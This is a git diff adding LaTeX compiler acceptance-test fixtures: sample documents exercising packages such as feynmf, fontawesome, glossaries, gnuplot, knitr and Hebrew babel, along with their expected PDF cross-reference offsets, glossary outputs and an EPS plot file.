+4DB5BB20B8835D365D35A442ECB2444F30466C3323001A087639B73848E3EE275406CFFB495ECDB4 +52F2A357F45D2D32BB22CAF9F9C2C44741A5341B29BB6C4322287A2A3891E1E853B976E17DD9306F +D98BDE8A0C97ABDCC7C708BD1BF49B524CD0DCECB40DDC557E9C90A1EDDEE57BBABC4C338F08A625 
+%% [Embedded EPS figure data omitted: plot of "Spatial rotation, χ" (y-axis, ticks at 0, π, 2π, 3π) versus "Impact parameter, b" (x-axis); binary eexec-encrypted Type 1 font programs for Mathematica1, Mathematica2, and Times-Roman-MISO (Mathematica typeface by Andre Kuzniarek, (c) 1996-2001 Wolfram Research) removed.]
+% [remaining hex-encoded Type 1 font data and zero-fill trailer omitted]
+cleartomark{restore}if
+
+%%EndFont
+%%EndResource
+% [PostScript text-drawing commands omitted; they typeset the plot legend
+% labels |q| = 0.02, |q| = 0.05, |q| = 0.07 and |q| = 0.1 in the
+% Times-Roman-MISO, Mathematica1 and Mathematica2 fonts]
+%Trailer
+%%EOF
diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/main.tex b/services/clsi/test/acceptance/fixtures/examples/epstopdf/main.tex
new file mode 100644
index 0000000..c35a378
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/epstopdf/main.tex
@@ -0,0 +1,10 @@
+\documentclass{article}
+
+\usepackage{graphicx}
+\usepackage{epstopdf}
+
+\begin{document}
+
+\includegraphics[width=\textwidth]{image}
+
+\end{document}
diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdf b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdf
new file mode 100644
index 0000000..74641a9
Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdf differ
diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdfxref
new file mode 100644
index 0000000..f6f11e1
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/epstopdf/output.pdfxref
@@ -0,0 +1,30 @@
+1/0: uncompressed; offset = 31354
+2/0: uncompressed; offset = 31614
+3/0: uncompressed; offset = 15
+4/0: uncompressed; offset = 216
+5/0: uncompressed; offset = 727
+6/0: uncompressed; offset = 777
+7/0: uncompressed; offset = 909
+8/0: uncompressed; offset = 1017
+9/0: uncompressed; offset = 19127
+10/0: uncompressed; offset = 19313
+11/0: uncompressed; offset = 19557
+12/0: uncompressed; offset = 19948
+13/0: uncompressed; offset = 20677
+14/0: uncompressed; offset = 23321
+15/0: uncompressed; offset = 30318
+16/0: compressed; stream = 15, index = 0
+17/0: compressed; stream = 15, index = 1
+18/0: compressed; stream = 15, index = 2
+19/0: compressed; stream = 15, index = 3
+20/0: compressed; stream = 15, index = 4
+21/0: compressed; stream = 15, index = 5
+22/0: compressed; stream = 15, index = 6
+23/0: compressed; stream = 15, index = 7
+24/0: compressed; stream = 15, index = 8
+25/0: compressed; stream = 15, index = 9
+26/0:
compressed; stream = 15, index = 10 +27/0: compressed; stream = 15, index = 11 +28/0: compressed; stream = 15, index = 12 +29/0: compressed; stream = 15, index = 13 +30/0: compressed; stream = 15, index = 14 diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmf/main.tex b/services/clsi/test/acceptance/fixtures/examples/feynmf/main.tex new file mode 100644 index 0000000..c36ed70 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmf/main.tex @@ -0,0 +1,28 @@ +\documentclass[a4paper]{article} +\usepackage{feynmf} + +\begin{document} + +\setlength{\unitlength}{1mm} + +\begin{fmffile}{diagram} + +\begin{center} +\begin{fmfgraph*}(41,17) +\fmfleftn{i}{2} +\fmfrightn{o}{2} +\fmflabel{$g_2$}{i1} +\fmflabel{$g_1$}{i2} +\fmflabel{$p_2$}{o1} +\fmflabel{$p_1$}{o2} +\fmf{quark}{i1,v1} +\fmf{quark}{i2,v1} +\fmfblob{.35w}{v1} +\fmf{quark}{v1,o1} +\fmf{quark}{v1,o2} +\end{fmfgraph*} +\end{center} + +\end{fmffile} + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdf b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdf new file mode 100644 index 0000000..60b36ad Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdfxref new file mode 100644 index 0000000..2aa923d --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdfxref @@ -0,0 +1,28 @@ +1/0: uncompressed; offset = 27064 +2/0: uncompressed; offset = 27312 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 713 +6/0: uncompressed; offset = 763 +7/0: uncompressed; offset = 892 +8/0: uncompressed; offset = 1007 +9/0: uncompressed; offset = 1235 +10/0: uncompressed; offset = 4832 +11/0: uncompressed; offset = 12199 +12/0: uncompressed; offset = 19196 +13/0: uncompressed; offset = 26341 +14/0: compressed; stream = 13, index = 0 +15/0: compressed; stream = 13, index = 1 +16/0: compressed; stream = 13, index = 2 +17/0: compressed; stream = 13, index = 3 +18/0: compressed; stream = 13, index = 4 +19/0: compressed; stream = 13, index = 5 +20/0: compressed; stream = 13, index = 6 +21/0: compressed; stream = 13, index = 7 +22/0: compressed; stream = 13, index = 8 +23/0: compressed; stream = 13, index = 9 +24/0: compressed; stream = 13, index = 10 +25/0: compressed; stream = 13, index = 11 +26/0: compressed; stream = 13, index = 12 +27/0: compressed; stream = 13, index = 13 +28/0: compressed; stream = 13, index = 14 diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/main.tex b/services/clsi/test/acceptance/fixtures/examples/feynmp/main.tex new file mode 100644 index 0000000..6027bf9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmp/main.tex @@ -0,0 +1,28 @@ +\documentclass[a4paper]{article} +\usepackage{feynmp} + +\begin{document} + +\setlength{\unitlength}{1mm} + +\begin{fmffile}{diagram} + +\begin{center} +\begin{fmfgraph*}(41,17) +\fmfleftn{i}{2} +\fmfrightn{o}{2} +\fmflabel{$g_2$}{i1} +\fmflabel{$g_1$}{i2} +\fmflabel{$p_2$}{o1} +\fmflabel{$p_1$}{o2} +\fmf{quark}{i1,v1} +\fmf{quark}{i2,v1} +\fmfblob{.35w}{v1} +\fmf{quark}{v1,o1} +\fmf{quark}{v1,o2} +\end{fmfgraph*} +\end{center} + +\end{fmffile} + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/options.json 
b/services/clsi/test/acceptance/fixtures/examples/feynmp/options.json new file mode 100644 index 0000000..a280541 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmp/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "latex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdf b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdf new file mode 100644 index 0000000..03c76e9 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdfxref new file mode 100644 index 0000000..c4ef625 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdfxref @@ -0,0 +1,20 @@ +1/0: uncompressed; offset = 4964 +2/0: uncompressed; offset = 5023 +3/0: uncompressed; offset = 5234 +4/0: uncompressed; offset = 15 +5/0: uncompressed; offset = 734 +6/0: uncompressed; offset = 799 +7/0: uncompressed; offset = 933 +8/0: uncompressed; offset = 1104 +9/0: uncompressed; offset = 1947 +10/0: uncompressed; offset = 1992 +11/0: uncompressed; offset = 2182 +12/0: uncompressed; offset = 2427 +13/0: uncompressed; offset = 2597 +14/0: uncompressed; offset = 2822 +15/0: uncompressed; offset = 2989 +16/0: uncompressed; offset = 3239 +17/0: uncompressed; offset = 3271 +18/0: uncompressed; offset = 3328 +19/0: uncompressed; offset = 3740 +20/0: uncompressed; offset = 4270 diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome/main.tex b/services/clsi/test/acceptance/fixtures/examples/fontawesome/main.tex new file mode 100644 index 0000000..42bfa8e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} +\usepackage{fontawesome} + +\begin{document} +Cloud \faCloud + +Cog \faCog + +Database \faDatabase + +Leaf \faLeaf +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdf b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdf new file mode 100644 index 0000000..da0df0a Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdfxref new file mode 100644 index 0000000..96eb1a0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 31058 +2/0: uncompressed; offset = 31307 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 855 +8/0: uncompressed; offset = 970 +9/0: uncompressed; offset = 1203 +10/0: uncompressed; offset = 18852 +11/0: uncompressed; offset = 30165 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, index = 7 +20/0: compressed; stream = 11, index = 8 +21/0: compressed; stream = 11, index = 9 +22/0: compressed; stream = 11, index = 10 +23/0: compressed; stream = 11, index = 11 diff --git 
a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/main.tex b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/main.tex
new file mode 100644
index 0000000..5158b67
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/main.tex
@@ -0,0 +1,16 @@
+\documentclass{article}
+\usepackage{fontspec}
+\defaultfontfeatures{Extension = .otf} % this is needed because
+                                       % fontawesome package loads by
+                                       % font name only
+\usepackage{fontawesome}
+
+\begin{document}
+Cloud \faCloud
+
+Cog \faCog
+
+Database \faDatabase
+
+Leaf \faLeaf
+\end{document}
diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/options.json b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/options.json
new file mode 100644
index 0000000..a2e0c09
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/options.json
@@ -0,0 +1,3 @@
+{
+  "compiler": "xelatex"
+}
diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdf b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdf
new file mode 100644
index 0000000..e329b97
Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdf differ
diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdfxref
new file mode 100644
index 0000000..d5c979d
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdfxref
@@ -0,0 +1,26 @@
+1/0: uncompressed; offset = 6344
+2/0: uncompressed; offset = 15
+3/0: uncompressed; offset = 216
+4/0: uncompressed; offset = 707
+5/0: uncompressed; offset = 757
+6/0: uncompressed; offset = 887
+7/0: uncompressed; offset = 990
+8/0: uncompressed; offset = 1257
+9/0: uncompressed; offset = 1679
+10/0: uncompressed; offset = 2052
+11/0: uncompressed; offset = 4249
+12/0: uncompressed; offset = 4343
+13/0: uncompressed; offset = 5387
+14/0: uncompressed; offset = 5481
+15/0: uncompressed; offset = 5519
+16/0: compressed; stream = 15, index = 0
+17/0: compressed; stream = 15, index = 1
+18/0: compressed; stream = 15, index = 2
+19/0: compressed; stream = 15, index = 3
+20/0: compressed; stream = 15, index = 4
+21/0: compressed; stream = 15, index = 5
+22/0: compressed; stream = 15, index = 6
+23/0: compressed; stream = 15, index = 7
+24/0: compressed; stream = 15, index = 8
+25/0: compressed; stream = 15, index = 9
+26/0: compressed; stream = 15, index = 10
diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/main.tex b/services/clsi/test/acceptance/fixtures/examples/glossaries/main.tex
new file mode 100644
index 0000000..336f708
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/main.tex
@@ -0,0 +1,17 @@
+\documentclass{article}
+
+\usepackage{glossaries}
+\makeglossaries
+
+\newglossaryentry{Physics}{
+    name=Physics,
+    description={is the study of stuff}
+}
+
+\begin{document}
+
+To solve various problems in \Gls{Physics} it can be useful to express any arbitrary piecewise-smooth function as a Fourier Series composed of multiple sine and cosine functions.
+ +\printglossaries + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glg b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glg new file mode 100644 index 0000000..6bae571 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glg @@ -0,0 +1,7 @@ +This is makeindex, version 2.15 [TeX Live 2011] (kpathsea + Thai support). +Scanning style file ./output.ist...........................done (27 attributes redefined, 0 ignored). +Scanning input file output.glo....done (1 entries accepted, 0 rejected). +Sorting entries...done (0 comparisons). +Generating output file output.gls....done (6 lines written, 0 warnings). +Output written in output.gls. +Transcript written in output.glg. diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glo b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glo new file mode 100644 index 0000000..0b6f71e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glo @@ -0,0 +1 @@ +\glossaryentry{Physics?\glossaryentryfield{Physics}{\glsnamefont{Physics}}{is the study of stuff}{\relax }|setentrycounter[]{page}\glsnumberformat}{1} diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.gls b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.gls new file mode 100644 index 0000000..128261a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.gls @@ -0,0 +1,6 @@ +\glossarysection[\glossarytoctitle]{\glossarytitle}\glossarypreamble +\begin{theglossary}\glossaryheader +\glsgroupheading{P}\relax \glsresetentrylist % +\glossaryentryfield{Physics}{\glsnamefont{Physics}}{is the study of stuff}{\relax }{\glossaryentrynumbers{\relax + \setentrycounter[]{page}\glsnumberformat{1}}}% +\end{theglossary}\glossarypostamble diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.ist b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.ist new file mode 100644 index 0000000..1861f24 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.ist @@ -0,0 +1,29 @@ +% makeindex style file created by the glossaries package +% for document 'output' on 2013-7-28 +actual '?' +encap '|' +level '!' +quote '"' +keyword "\\glossaryentry" +preamble "\\glossarysection[\\glossarytoctitle]{\\glossarytitle}\\glossarypreamble\n\\begin{theglossary}\\glossaryheader\n" +postamble "\%\n\\end{theglossary}\\glossarypostamble\n" +group_skip "\\glsgroupskip\n" +item_0 "\%\n" +item_1 "\%\n" +item_2 "\%\n" +item_01 "\%\n" +item_x1 "\\relax \\glsresetentrylist\n" +item_12 "\%\n" +item_x2 "\\relax \\glsresetentrylist\n" +delim_0 "\{\\glossaryentrynumbers\{\\relax " +delim_1 "\{\\glossaryentrynumbers\{\\relax " +delim_2 "\{\\glossaryentrynumbers\{\\relax " +delim_t "\}\}" +delim_n "\\delimN " +delim_r "\\delimR " +headings_flag 1 +heading_prefix "\\glsgroupheading\{" +heading_suffix "\}\\relax \\glsresetentrylist " +symhead_positive "glssymbols" +numhead_positive "glsnumbers" +page_compositor "." 
diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdf b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdf new file mode 100644 index 0000000..23a0614 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdfxref new file mode 100644 index 0000000..cbbbeb0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 34767 +2/0: uncompressed; offset = 35015 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 856 +8/0: uncompressed; offset = 971 +9/0: uncompressed; offset = 1394 +10/0: uncompressed; offset = 10990 +11/0: uncompressed; offset = 19087 +12/0: uncompressed; offset = 33769 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 +20/0: compressed; stream = 12, index = 7 +21/0: compressed; stream = 12, index = 8 +22/0: compressed; stream = 12, index = 9 +23/0: compressed; stream = 12, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/gnuplot/main.tex b/services/clsi/test/acceptance/fixtures/examples/gnuplot/main.tex new file mode 100644 index 0000000..09077a5 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/gnuplot/main.tex @@ -0,0 +1,26 @@ +\documentclass{article} +\usepackage{pgfplots} +\usepackage{nopageno} + +\pgfplotsset{compat=newest} + +\begin{document} + +\begin{tikzpicture} + \begin{axis} + \addplot +[no markers, + raw gnuplot, + thick, + empty line = jump + ] gnuplot { + set contour base; + set cntrparam levels discrete 0.003; + unset surface; + set view map; + set isosamples 500; + splot x**3-3*x+3-y**2; + }; + \end{axis} +\end{tikzpicture} + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdf b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdf new file mode 100644 index 0000000..9e93e54 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdfxref new file mode 100644 index 0000000..f9dee6b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdfxref @@ -0,0 +1,22 @@ +1/0: uncompressed; offset = 23295 +2/0: uncompressed; offset = 23543 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 671 +6/0: uncompressed; offset = 721 +7/0: uncompressed; offset = 847 +8/0: uncompressed; offset = 955 +9/0: uncompressed; offset = 7385 +10/0: uncompressed; offset = 15752 +11/0: uncompressed; offset = 22721 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, 
index = 7 +20/0: compressed; stream = 11, index = 8 +21/0: compressed; stream = 11, index = 9 +22/0: compressed; stream = 11, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/hebrew/main.tex b/services/clsi/test/acceptance/fixtures/examples/hebrew/main.tex new file mode 100644 index 0000000..0eb48d9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/hebrew/main.tex @@ -0,0 +1,14 @@ +\documentclass{article} +\usepackage[utf8x]{inputenc} +\usepackage[hebrew,english]{babel} + +\begin{document} +\selectlanguage{hebrew} + + כדי לכתוב משהו באנגלית חייבים להשתמש במקרו הבא וכאן + + ממשיכים לכתוב בעברית. טקסט נוסחאות תמיד יהיה בכיוון שמאל-לימין + +\selectlanguage{english} +This is a test. +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdf b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdf new file mode 100644 index 0000000..b7f6883 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdfxref new file mode 100644 index 0000000..4750e43 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdfxref @@ -0,0 +1,20 @@ +1/0: uncompressed; offset = 24490 +2/0: uncompressed; offset = 24739 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 657 +6/0: uncompressed; offset = 707 +7/0: uncompressed; offset = 833 +8/0: uncompressed; offset = 948 +9/0: uncompressed; offset = 1290 +10/0: uncompressed; offset = 13083 +11/0: uncompressed; offset = 23411 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, index = 7 +20/0: compressed; stream = 11, index = 8 diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr/main.Rtex b/services/clsi/test/acceptance/fixtures/examples/knitr/main.Rtex new file mode 100644 index 0000000..add779a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr/main.Rtex @@ -0,0 +1,13 @@ +\documentclass{article} +\begin{document} + +Hello world $x^2 = 0$. 
+ +%% chunk options: cache this chunk +%% begin.rcode my-cache, cache=TRUE +% set.seed(123) +% x = runif(10) +% sd(x) # standard deviation +%% end.rcode + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdf b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdf new file mode 100644 index 0000000..67435f5 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdfxref new file mode 100644 index 0000000..3fe1986 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdfxref @@ -0,0 +1,31 @@ +1/0: uncompressed; offset = 43550 +2/0: uncompressed; offset = 43799 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 734 +6/0: uncompressed; offset = 784 +7/0: uncompressed; offset = 913 +8/0: uncompressed; offset = 1021 +9/0: uncompressed; offset = 1546 +10/0: uncompressed; offset = 5794 +11/0: uncompressed; offset = 12915 +12/0: uncompressed; offset = 23660 +13/0: uncompressed; offset = 30657 +14/0: uncompressed; offset = 42604 +15/0: compressed; stream = 14, index = 0 +16/0: compressed; stream = 14, index = 1 +17/0: compressed; stream = 14, index = 2 +18/0: compressed; stream = 14, index = 3 +19/0: compressed; stream = 14, index = 4 +20/0: compressed; stream = 14, index = 5 +21/0: compressed; stream = 14, index = 6 +22/0: compressed; stream = 14, index = 7 +23/0: compressed; stream = 14, index = 8 +24/0: compressed; stream = 14, index = 9 +25/0: compressed; stream = 14, index = 10 +26/0: compressed; stream = 14, index = 11 +27/0: compressed; stream = 14, index = 12 +28/0: compressed; stream = 14, index = 13 +29/0: compressed; stream = 14, index = 14 +30/0: compressed; stream = 14, index = 15 +31/0: compressed; stream = 14, index = 16 diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/main.Rtex b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/main.Rtex new file mode 100644 index 0000000..29d575e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/main.Rtex @@ -0,0 +1,35 @@ +\documentclass{article} +\usepackage[utf8]{inputenc} +\usepackage[spanish]{babel} + +\begin{document} + +\tableofcontents + +\vspace{2cm} %Add a 2cm space + +\begin{abstract} +Este es un breve resumen del contenido del +documento escrito en español. +\end{abstract} + +\section{Sección Introductoria} +Esta es la primera sección, podemos agregar +algunos elementos adicionales y todo será +escrito correctamente. Más aún, si una palabra +es demaciado larga y tiene que ser truncada, +babel tratará de truncarla correctamente +dependiendo del idioma. 
+ +\section{Sección con teoremas} +Esta sección es para ver que pasa con los comandos +que definen texto + +%% chunk options: cache this chunk +%% begin.rcode my-cache, cache=TRUE +% set.seed(123) +% x = runif(10) +% sd(x) # standard deviation +%% end.rcode + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdf b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdf new file mode 100644 index 0000000..1c236e6 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdfxref new file mode 100644 index 0000000..30918b7 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdfxref @@ -0,0 +1,39 @@ +1/0: uncompressed; offset = 75299 +2/0: uncompressed; offset = 75548 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 790 +6/0: uncompressed; offset = 840 +7/0: uncompressed; offset = 975 +8/0: uncompressed; offset = 1083 +9/0: uncompressed; offset = 2128 +10/0: uncompressed; offset = 13799 +11/0: uncompressed; offset = 23682 +12/0: uncompressed; offset = 31867 +13/0: uncompressed; offset = 36116 +14/0: uncompressed; offset = 50352 +15/0: uncompressed; offset = 61569 +16/0: uncompressed; offset = 73516 +17/0: compressed; stream = 16, index = 0 +18/0: compressed; stream = 16, index = 1 +19/0: compressed; stream = 16, index = 2 +20/0: compressed; stream = 16, index = 3 +21/0: compressed; stream = 16, index = 4 +22/0: compressed; stream = 16, index = 5 +23/0: compressed; stream = 16, index = 6 +24/0: compressed; stream = 16, index = 7 +25/0: compressed; stream = 16, index = 8 +26/0: compressed; stream = 16, index = 9 +27/0: compressed; stream = 16, index = 10 +28/0: compressed; stream = 16, index = 11 +29/0: compressed; stream = 16, index = 12 +30/0: compressed; stream = 16, index = 13 +31/0: compressed; stream = 16, index = 14 +32/0: compressed; stream = 16, index = 15 +33/0: compressed; stream = 16, index = 16 +34/0: compressed; stream = 16, index = 17 +35/0: compressed; stream = 16, index = 18 +36/0: compressed; stream = 16, index = 19 +37/0: compressed; stream = 16, index = 20 +38/0: compressed; stream = 16, index = 21 +39/0: compressed; stream = 16, index = 22 diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/image.eps b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/image.eps new file mode 100644 index 0000000..fb131b9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/image.eps @@ -0,0 +1,6673 @@ +%!PS-Adobe-3.0 EPSF-1.2 +%%BoundingBox: 0 0 432 268 +%%HiResBoundingBox: 0 0 432 268 +%%Creator: (Wolfram Mathematica 8.0 for Linux x86 (64-bit) (February 23, 2011)) +%%CreationDate: (Monday, October 8, 2012)(15:03:46) +%%Title: Clipboard +%%DocumentNeededResources: font Times-Roman +%%DocumentSuppliedResources: font Times-Roman-MISO +%%+ font Mathematica2 +%%+ font Mathematica1 +%%DocumentNeededFonts: Times-Roman +%%DocumentSuppliedFonts: Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%DocumentFonts: Times-Roman +%%+ Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%EndComments +/p{gsave}bind def +/P{grestore}bind def +/g{setgray}bind def +/r{setrgbcolor}bind def +/k{setcmykcolor}bind def +/w{setlinewidth}bind def +/np{newpath}bind def +/m{moveto}bind def +/Mr{rmoveto}bind def 
+/Mx{currentpoint exch pop moveto}bind def
+/My{currentpoint pop exch moveto}bind def
+/X{0 rmoveto}bind def
+/Y{0 exch rmoveto}bind def
+/N{currentpoint 3 -1 roll show moveto}bind def
+/L{lineto}bind def
+/rL{rlineto}bind def
+/C{curveto}bind def
+/cp{closepath}bind def
+/F{eofill}bind def
+/f{fill}bind def
+/s{stroke}bind def
+/S{show}bind def
+/tri{p 9 6 roll r 6 4 roll m 4 2 roll L L cp F P}bind def
+/Msf{findfont exch scalefont[1 0 0 -1 0 0]makefont setfont}bind def
+1 -1 scale 0 -267.698 translate
+-35.28 -2.88 translate
+[1 0 0 1 0 0 ] concat
+1 w
+0 g
+0 g
+[ ] 0 setdash
+2 setlinecap
+0 setlinejoin
+10 setmiterlimit
+
+%%MathematicaCell
+%Cell[BoxData[
+% GraphicsBox[{{}, {},
+% {GrayLevel[0], LineBox[CompressedData["
+% [base64-compressed curve coordinate data omitted; the cell contains
+% three GrayLevel[0] LineBox curves in total]
